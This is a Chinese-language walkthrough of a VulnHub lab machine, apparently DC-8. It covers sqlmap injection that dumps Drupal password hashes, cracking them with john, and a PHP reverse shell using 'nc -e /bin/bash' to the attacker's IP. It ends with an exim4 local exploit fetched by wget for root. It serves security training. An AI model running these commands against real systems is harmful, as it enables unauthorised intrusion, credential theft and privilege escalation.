靶机地址
https://www.vulnhub.com/?q=dc-
打开靶机,设置为同一种nat模式
kali 信息收集主机发现 ,并扫描该主机ip
arp-scan -l
nmap -p- -sV 192.168.1.206
访问页面,扫描该网站目录,没有发现有用界面
dirb http://192.168.1.206 |grep -v 403
访问网页,发现nid在变化,尝试手工注入发现报错
通过sqlmap注入,查询到数据库为d7db information_schema
python sqlmap.py -u "http://192.168.1.206/?nid=3" --dbs --batch 查询数据库
查询表:
python sqlmap.py -u "http://192.168.1.206/?nid=3" --batch -D d7db --tables
查询列
python sqlmap.py -u "http://192.168.1.206/?nid=3" -D d7db -T users --columns
查询用户密码
python sqlmap.py -u "http://192.168.1.206/?nid=3" -D d7db -T users -C "uid,name,pass" --dump
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
将hash值放入2.txt,利用工具john爆破密码为turtle
john --wordlist=/usr/share/john/password.lst --rules 2.txt
ssh无法登录,尝试网页后台登录界面
远程代码执行
在Find content => WEBFROM => Form settings中可以编写shell,其中p标签中的东西不要删除
<?php
system("nc -e /bin/bash 192.168.1.162 1234");
?>
开启监听后,提交页面,接收反弹后开启交互模式
python -c 'import pty;pty.spawn("/bin/bash")'
find 命令查找具有sudo 权限的命令,发现exim4,查询版本
find / -perm -u=s -type f 2>/dev/null
exim4 --version
serachsploit查找exim命令的漏洞,复制到本地并改名为exp.sh
serachsploit exim
cp /usr/share/exploitdb/exploits/linux/local/46996.sh exp.sh
查看文件是否为linux可执行文件,如果为dos修改为unix,开启http服务,在交互式下远程下载exp.sh,进入/tmp目录下载
set ff?
python3 -m http.server 80
wget http://192.168.1.162:8000/exp.sh
给exp.sh执行权限,执行
chmod 777 exp.sh
./exp.sh -m netcat
进入root目录查看flag
参考链接
https://blog.csdn.net/weixin_45744814/article/details/120113301